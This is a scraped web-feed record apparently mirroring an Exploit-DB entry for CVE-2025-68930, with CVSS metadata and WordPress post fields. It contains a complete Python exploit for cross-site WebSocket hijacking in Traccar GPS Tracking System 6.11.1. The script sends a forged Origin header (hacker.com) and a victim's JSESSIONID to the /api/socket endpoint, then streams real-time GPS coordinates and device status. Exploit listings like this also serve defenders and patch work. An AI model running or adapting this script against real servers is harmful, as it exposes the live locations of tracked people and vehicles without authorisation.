{“lastseen”:”2026-05-04T13:27:58″,”description”:”Exploit Title: Traccar GPS Tracking System 6.11.1 – Cross-Site WebSocket Hijacking CSWSH Date: 2026-02-26 Exploit Author: Hazar Taspinar Vendor Homepage: https:\/\/www.traccar.org\/ Software Link: https:\/\/github.com\/traccar\/traccar Version: = 6.11.1…”,”published”:”2026-05-04T00:00:00″,”modified”:”2026-05-04T00:00:00″,”type”:”exploitdb”,”title”:”Traccar GPS Tracking System 6.11.1 – Cross-Site WebSocket Hijacking (CSWSH)”,”source”:””,”references”:””,”id”:”EDB-ID:52545″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-68930″],”sourceData”:”# Exploit Title: Traccar GPS Tracking System 6.11.1 – Cross-Site WebSocket Hijacking (CSWSH)\\r\\n# Date: 2026-02-26\\r\\n# Exploit Author: Hazar Taspinar\\r\\n# Vendor Homepage: https:\/\/www.traccar.org\/\\r\\n# Software Link: https:\/\/github.com\/traccar\/traccar\\r\\n# Version: \\u003c= 6.11.1\\r\\n# Tested on: Windows 11 \/ Linux\\r\\n# CVE: CVE-2025-68930\\r\\n\\r\\n\\”\\”\\”\\r\\nDescription:\\r\\nTraccar fails to validate the ‘Origin’ header in WebSocket connections (\/api\/socket). \\r\\nAn attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header \\r\\nalong with a victim’s valid JSESSIONID. This allows the attacker to hijack the \\r\\nWebSocket connection and leak real-time sensitive data, including GPS coordinates \\r\\nand device status.\\r\\n\\r\\nRequirements:\\r\\npip install websocket-client\\r\\n\\”\\”\\”\\r\\n\\r\\nimport websocket\\r\\nimport argparse\\r\\nimport sys\\r\\n\\r\\ndef on_message(ws, message):\\r\\n print(f\\”[+] DATA LEAKED: {message}\\”)\\r\\n\\r\\ndef on_error(ws, error):\\r\\n print(f\\”[-] Error: {error}\\”)\\r\\n\\r\\ndef on_close(ws, close_status_code, close_msg):\\r\\n print(\\”[-] Connection closed.\\”)\\r\\n\\r\\ndef on_open(ws):\\r\\n print(\\”[*] WebSocket Handshake Successful!\\”)\\r\\n print(\\”[*] Connection upgraded. Streaming real-time sensitive data…\\\\n\\”)\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(description=\\”Traccar CSWSH Exploit – Information Disclosure\\”)\\r\\n parser.add_argument(\\”–target\\”, required=True, help=\\”Target IP address (e.g., 192.168.1.5)\\”)\\r\\n parser.add_argument(\\”–port\\”, default=\\”8082\\”, help=\\”Target Port (default: 8082)\\”)\\r\\n parser.add_argument(\\”–cookie\\”, required=True, help=\\”Valid JSESSIONID (e.g., node0xxxxxxx)\\”)\\r\\n \\r\\n args = parser.parse_args()\\r\\n\\r\\n # Construct the WebSocket URL\\r\\n url = f\\”ws:\/\/{args.target}:{args.port}\/api\/socket\\”\\r\\n \\r\\n # Malicious headers triggering the bypass\\r\\n # The ‘Origin’ header is set to an external domain to demonstrate lack of validation.\\r\\n headers = [\\r\\n \\”Origin: http:\/\/hacker.com\\”,\\r\\n f\\”Cookie: JSESSIONID={args.cookie}\\”\\r\\n ]\\r\\n\\r\\n print(f\\”\\”\\”\\r\\n ================================================\\r\\n TRACCAR GPS TRACKER – CSWSH EXPLOIT\\r\\n Exploit Author: Hazar Taspinar\\r\\n CVE: CVE-2025-68930\\r\\n Target: {url}\\r\\n ================================================\\r\\n \\”\\”\\”)\\r\\n\\r\\n # Initiate WebSocket connection\\r\\n ws = websocket.WebSocketApp(url,\\r\\n on_message=on_message,\\r\\n on_error=on_error,\\r\\n on_close=on_close,\\r\\n on_open=on_open,\\r\\n header=headers)\\r\\n \\r\\n try:\\r\\n ws.run_forever()\\r\\n except KeyboardInterrupt:\\r\\n print(\\”\\\\n[*] Exploit stopped by user.\\”)\\r\\n sys.exit(0)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52545″,”cvss”:{“score”:7.1,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52545″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-04T13:27:58″,”description”:”Exploit Title: Traccar GPS Tracking System 6.11.1 – Cross-Site WebSocket Hijacking CSWSH Date: 2026-02-26 Exploit Author: Hazar Taspinar Vendor Homepage: https:\/\/www.traccar.org\/ Software Link: https:\/\/github.com\/traccar\/traccar Version:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,50,12,40,15,13,7,11,5],"class_list":["post-51216","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-71","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n